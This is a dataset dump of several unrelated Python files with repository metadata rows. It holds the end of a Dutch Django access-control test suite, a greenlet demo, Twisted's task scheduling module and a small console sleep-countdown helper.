cluster = NhbCluster.objects.filter(regio=ver.regio, gebruik='25').all()[2]
ver.clusters.add(cluster)
self.nhb_ver2 = ver
def test_anon(self):
self.e2e_logout()
with self.assert_max_queries(20):
resp = self.client.get(self.url_lijst)
self.assert403(resp)
self.e2e_assert_other_http_commands_not_supported(self.url_lijst)
def test_it(self):
# landelijke lijst + leden aantal
self.e2e_login_and_pass_otp(self.testdata.account_admin)
self.e2e_wisselnaarrol_it()
self.e2e_check_rol('IT')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_bb(self):
# landelijke lijst met rayon & regio
self.e2e_login_and_pass_otp(self.testdata.account_bb)
self.e2e_wisselnaarrol_bb()
self.e2e_check_rol('BB')
with self.assert_max_queries(8):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_bko(self):
# landelijke lijst met rayon & regio
self.e2e_login_and_pass_otp(self.account_bko)
self.e2e_wissel_naar_functie(self.functie_bko)
self.e2e_check_rol('BKO')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_rko(self):
# rayon lijst met regio kolom (geen rayon kolom)
self.e2e_login_and_pass_otp(self.account_rko)
self.e2e_wissel_naar_functie(self.functie_rko)
self.e2e_check_rol('RKO')
with self.assert_max_queries(7):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_rcl(self):
# regio lijst met hwls (zonder rayon/regio kolommen)
self.e2e_login_and_pass_otp(self.account_rcl)
self.e2e_wissel_naar_functie(self.functie_rcl)
self.e2e_check_rol('RCL')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
self.e2e_assert_other_http_commands_not_supported(self.url_lijst)
def test_rcl_met_clusters(self):
# test de lijst met clusters erin
# log in als RCL
self.e2e_login_and_pass_otp(self.account_rcl)
self.e2e_wissel_naar_functie(self.functie_rcl)
self.e2e_check_rol('RCL')
# verenigingen 1 en 2 horen beide bij regio 101
# stop ze een voor een in een eigen cluster
# maak een cluster aan en stop nhb_ver1 erin
cluster = NhbCluster()
cluster.regio = self.nhb_ver1.regio
cluster.letter = 'Y'
cluster.naam = "Bovenlijns"
cluster.gebruik = '18'
cluster.save()
self.nhb_ver1.cluster = cluster
self.nhb_ver1.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
# stop nhb_ver2 in hetzelfde cluster
self.nhb_ver2.cluster = cluster
self.nhb_ver2.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
# stop nhb_ver2 in een apart cluster
cluster = NhbCluster()
cluster.regio = self.nhb_ver1.regio
cluster.letter = 'Z'
cluster.naam = "Onderlijns"
cluster.gebruik = '18'
cluster.save()
self.nhb_ver2.cluster = cluster
self.nhb_ver2.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
def test_hwl(self):
# de hwl krijgt dezelfde lijst als de rcl
self.e2e_login_and_pass_otp(self.account_hwl)
self.e2e_wissel_naar_functie(self.functie_hwl)
self.e2e_check_rol('HWL')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_overzicht_anon(self):
with self.assert_max_queries(20):
resp = self.client.get('/bondscompetities/')
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('competitie/kies.dtl', 'plein/site_layout.dtl'))
# end of file
| 38.831224 | 110 | 0.664457 |
4a1b73355d2e16f23c98ad5143b50f40b9d2e57e
| 242 |
py
|
Python
|
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | 7 |
2019-01-14T01:11:32.000Z
|
2022-01-17T16:28:56.000Z
|
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | null | null | null |
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | 2 |
2019-01-14T00:51:49.000Z
|
2020-08-13T03:18:27.000Z
|
from greenlet import greenlet
# pip install greenlet
def test1(x, y):
z = gr2.switch(x+y)
print(z)
def test2(u):
print (u)
gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
hello world
42
"""
| 12.736842 | 29 | 0.665289 |
4a1b734895efe1b2bec278b565c214fc0ed38f92
| 12,667 |
py
|
Python
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 19 |
2015-05-01T19:59:03.000Z
|
2021-12-09T08:03:16.000Z
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 1 |
2018-01-03T15:26:49.000Z
|
2018-01-03T15:26:49.000Z
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 30 |
2015-03-25T19:40:07.000Z
|
2021-05-28T22:59:26.000Z
|
# -*- test-case-name: twisted.test.test_task -*-
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Scheduling utility methods and classes.
@author: Jp Calderone
"""
__metaclass__ = type
import time
from zope.interface import implements
from twisted.python import reflect
from twisted.internet import base, defer
from twisted.internet.interfaces import IReactorTime
class LoopingCall:
"""Call a function repeatedly.
If C{f} returns a deferred, rescheduling will not take place until the
deferred has fired. The result value is ignored.
@ivar f: The function to call.
@ivar a: A tuple of arguments to pass the function.
@ivar kw: A dictionary of keyword arguments to pass to the function.
@ivar clock: A provider of
L{twisted.internet.interfaces.IReactorTime}. The default is
L{twisted.internet.reactor}. Feel free to set this to
something else, but it probably ought to be set *before*
calling L{start}.
@type _lastTime: C{float}
@ivar _lastTime: The time at which this instance most recently scheduled
itself to run.
"""
call = None
running = False
deferred = None
interval = None
_lastTime = 0.0
starttime = None
def __init__(self, f, *a, **kw):
self.f = f
self.a = a
self.kw = kw
from twisted.internet import reactor
self.clock = reactor
def start(self, interval, now=True):
"""Start running function every interval seconds.
@param interval: The number of seconds between calls. May be
less than one. Precision will depend on the underlying
platform, the available hardware, and the load on the system.
@param now: If True, run this call right now. Otherwise, wait
until the interval has elapsed before beginning.
@return: A Deferred whose callback will be invoked with
C{self} when C{self.stop} is called, or whose errback will be
invoked when the function raises an exception or returned a
deferred that has its errback invoked.
"""
assert not self.running, ("Tried to start an already running "
"LoopingCall.")
if interval < 0:
raise ValueError, "interval must be >= 0"
self.running = True
d = self.deferred = defer.Deferred()
self.starttime = self.clock.seconds()
self._lastTime = self.starttime
self.interval = interval
if now:
self()
else:
self._reschedule()
return d
def stop(self):
"""Stop running function.
"""
assert self.running, ("Tried to stop a LoopingCall that was "
"not running.")
self.running = False
if self.call is not None:
self.call.cancel()
self.call = None
d, self.deferred = self.deferred, None
d.callback(self)
def __call__(self):
def cb(result):
if self.running:
self._reschedule()
else:
d, self.deferred = self.deferred, None
d.callback(self)
def eb(failure):
self.running = False
d, self.deferred = self.deferred, None
d.errback(failure)
self.call = None
d = defer.maybeDeferred(self.f, *self.a, **self.kw)
d.addCallback(cb)
d.addErrback(eb)
def _reschedule(self):
"""
Schedule the next iteration of this looping call.
"""
if self.interval == 0:
self.call = self.clock.callLater(0, self)
return
currentTime = self.clock.seconds()
# Find how long is left until the interval comes around again.
untilNextTime = (self._lastTime - currentTime) % self.interval
# Make sure it is in the future, in case more than one interval worth
# of time passed since the previous call was made.
nextTime = max(
self._lastTime + self.interval, currentTime + untilNextTime)
# If the interval falls on the current time exactly, skip it and
# schedule the call for the next interval.
if nextTime == currentTime:
nextTime += self.interval
self._lastTime = nextTime
self.call = self.clock.callLater(nextTime - currentTime, self)
def __repr__(self):
if hasattr(self.f, 'func_name'):
func = self.f.func_name
if hasattr(self.f, 'im_class'):
func = self.f.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.f)
return 'LoopingCall<%r>(%s, *%s, **%s)' % (
self.interval, func, reflect.safe_repr(self.a),
reflect.safe_repr(self.kw))
class SchedulerStopped(Exception):
"""
The operation could not complete because the scheduler was stopped in
progress or was already stopped.
"""
class _Timer(object):
MAX_SLICE = 0.01
def __init__(self):
self.end = time.time() + self.MAX_SLICE
def __call__(self):
return time.time() >= self.end
_EPSILON = 0.00000001
def _defaultScheduler(x):
from twisted.internet import reactor
return reactor.callLater(_EPSILON, x)
class Cooperator(object):
"""
Cooperative task scheduler.
"""
def __init__(self,
terminationPredicateFactory=_Timer,
scheduler=_defaultScheduler,
started=True):
"""
Create a scheduler-like object to which iterators may be added.
@param terminationPredicateFactory: A no-argument callable which will
be invoked at the beginning of each step and should return a
no-argument callable which will return False when the step should be
terminated. The default factory is time-based and allows iterators to
run for 1/100th of a second at a time.
@param scheduler: A one-argument callable which takes a no-argument
callable and should invoke it at some future point. This will be used
to schedule each step of this Cooperator.
@param started: A boolean which indicates whether iterators should be
stepped as soon as they are added, or if they will be queued up until
L{Cooperator.start} is called.
"""
self.iterators = []
self._metarator = iter(())
self._terminationPredicateFactory = terminationPredicateFactory
self._scheduler = scheduler
self._delayedCall = None
self._stopped = False
self._started = started
def coiterate(self, iterator, doneDeferred=None):
"""
Add an iterator to the list of iterators I am currently running.
@return: a Deferred that will fire when the iterator finishes.
"""
if doneDeferred is None:
doneDeferred = defer.Deferred()
if self._stopped:
doneDeferred.errback(SchedulerStopped())
return doneDeferred
self.iterators.append((iterator, doneDeferred))
self._reschedule()
return doneDeferred
def _tasks(self):
terminator = self._terminationPredicateFactory()
while self.iterators:
for i in self._metarator:
yield i
if terminator():
return
self._metarator = iter(self.iterators)
def _tick(self):
"""
Run one scheduler tick.
"""
self._delayedCall = None
for taskObj in self._tasks():
iterator, doneDeferred = taskObj
try:
result = iterator.next()
except StopIteration:
self.iterators.remove(taskObj)
doneDeferred.callback(iterator)
except:
self.iterators.remove(taskObj)
doneDeferred.errback()
else:
if isinstance(result, defer.Deferred):
self.iterators.remove(taskObj)
def cbContinue(result, taskObj=taskObj):
self.coiterate(*taskObj)
result.addCallbacks(cbContinue, doneDeferred.errback)
self._reschedule()
_mustScheduleOnStart = False
def _reschedule(self):
if not self._started:
self._mustScheduleOnStart = True
return
if self._delayedCall is None and self.iterators:
self._delayedCall = self._scheduler(self._tick)
def start(self):
"""
Begin scheduling steps.
"""
self._stopped = False
self._started = True
if self._mustScheduleOnStart:
del self._mustScheduleOnStart
self._reschedule()
def stop(self):
"""
Stop scheduling steps. Errback the completion Deferreds of all
iterators which have been added and forget about them.
"""
self._stopped = True
for iterator, doneDeferred in self.iterators:
doneDeferred.errback(SchedulerStopped())
self.iterators = []
if self._delayedCall is not None:
self._delayedCall.cancel()
self._delayedCall = None
_theCooperator = Cooperator()
def coiterate(iterator):
"""
Cooperatively iterate over the given iterator, dividing runtime between it
and all other iterators which have been passed to this function and not yet
exhausted.
"""
return _theCooperator.coiterate(iterator)
class Clock:
"""
Provide a deterministic, easily-controlled implementation of
L{IReactorTime.callLater}. This is commonly useful for writing
deterministic unit tests for code which schedules events using this API.
"""
implements(IReactorTime)
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
"""
Pretend to be time.time(). This is used internally when an operation
such as L{IDelayedCall.reset} needs to determine a a time value
relative to the current time.
@rtype: C{float}
@return: The time which should be considered the current time.
"""
return self.rightNow
def callLater(self, when, what, *a, **kw):
"""
See L{twisted.internet.interfaces.IReactorTime.callLater}.
"""
dc = base.DelayedCall(self.seconds() + when,
what, a, kw,
self.calls.remove,
lambda c: None,
self.seconds)
self.calls.append(dc)
self.calls.sort(lambda a, b: cmp(a.getTime(), b.getTime()))
return dc
def getDelayedCalls(self):
"""
See L{twisted.internet.interfaces.IReactorTime.getDelayedCalls}
"""
return self.calls
def advance(self, amount):
"""
Move time on this clock forward by the given amount and run whatever
pending calls should be run.
@type amount: C{float}
@param amount: The number of seconds which to advance this clock's
time.
"""
self.rightNow += amount
while self.calls and self.calls[0].getTime() <= self.seconds():
call = self.calls.pop(0)
call.called = 1
call.func(*call.args, **call.kw)
def pump(self, timings):
"""
Advance incrementally by the given set of times.
@type timings: iterable of C{float}
"""
for amount in timings:
self.advance(amount)
def deferLater(clock, delay, callable, *args, **kw):
"""
Call the given function after a certain period of time has passed.
@type clock: L{IReactorTime} provider
@param clock: The object which will be used to schedule the delayed
call.
@type delay: C{float} or C{int}
@param delay: The number of seconds to wait before calling the function.
@param callable: The object to call after the delay.
@param *args: The positional arguments to pass to C{callable}.
@param **kw: The keyword arguments to pass to C{callable}.
@rtype: L{defer.Deferred}
@return: A deferred that fires with the result of the callable when the
specified time has elapsed.
"""
d = defer.Deferred()
d.addCallback(lambda ignored: callable(*args, **kw))
clock.callLater(delay, d.callback, None)
return d
__all__ = [
'LoopingCall',
'Clock',
'SchedulerStopped', 'Cooperator', 'coiterate',
'deferLater',
]
| 30.087886 | 79 | 0.604642 |
4a1b73a828ab40ba69413776a541842602a275e0
| 765 |
py
|
Python
|
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
from sys import stdout
import time
class SleepHandler:
@staticmethod
def sleep(seconds):
digits = len(str(seconds))
seconds += 1
for i in range(1, seconds):
stdout.write('\r')
if i % 4 == 0:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 1:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 2:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 3:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
stdout.flush()
time.sleep(1)
stdout.write('\r')
stdout.flush()
| 34.772727 | 81 | 0.477124 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.